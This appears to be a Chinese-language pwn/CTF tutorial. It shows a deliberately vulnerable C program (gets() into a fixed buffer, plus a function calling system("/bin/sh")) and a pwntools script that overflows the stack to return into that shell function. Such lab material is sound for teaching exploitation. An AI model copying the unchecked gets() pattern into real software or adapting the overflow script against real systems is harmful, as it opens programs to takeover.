#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <stdlib.h>
void login()
{
char name[50];
gets(name);
printf("Welcome %syou are in the pwn world.\n",name);
}
void callsystem()
{
system("/bin/sh");
}
int main()
{
int random = rand(),key;
//printf("%d\n", random);
/*printf("Enter the key:");
scanf("%d", &key);
if ((key^random) == 1193046)
{
//printf("1\n");
login();
return 0;
}
else
{
//printf("2\n");
exit(0);
}*/
login();
return 0;
}
先给出源码,为了方便,这里把其他的一些比较的方式给略去了,都直接注释掉了,很明显,这个程序给出了callsys的函数,而且gets的漏洞也很明显,所以可以直接干了,这边看栈的高度可以直接用IDA,也可以用GDB配合着pattern去看,pattern脚本没有地方下载的我的博客就有资源,一个积分就够了,具体的步骤接下来仔细地讲讲:
这个是main函数,发现rand函数没有用,其实这里没有开启,有兴趣地可以把上面地源码注释地去掉再去做做看,然后查看login函数:
发现这里有个gets地漏洞,因为没有对输入地字符串进行限制,所以很容易就进行溢出,这里也可以看出栈地高度是0x40,而且程序是64位的,所以rbp的大小是8bit;
这里还有一个重要的函数就是callsys:
直接返回了/bin/sh,所以这里可以直接用这个地址作为返回的地址,接下来就直接给出脚本了:
#!/usr/bin/env python
# encoding: utf-8
from pwn import *
#p=remote("",)
p=process("./nokey",stdin=PTY)
callsys=0x0000000000400628
payload="A"*64+"A"*8+p64(callsys)
p.sendline(payload)
p.interactive()
callsys的函数的地址就是在IDA中看到的起始地址,而关于p=process("./nokey",stdin=PTY),这句话不加后面的是会报错的,之后执行一下就可以发现这个程序已经成功溢出了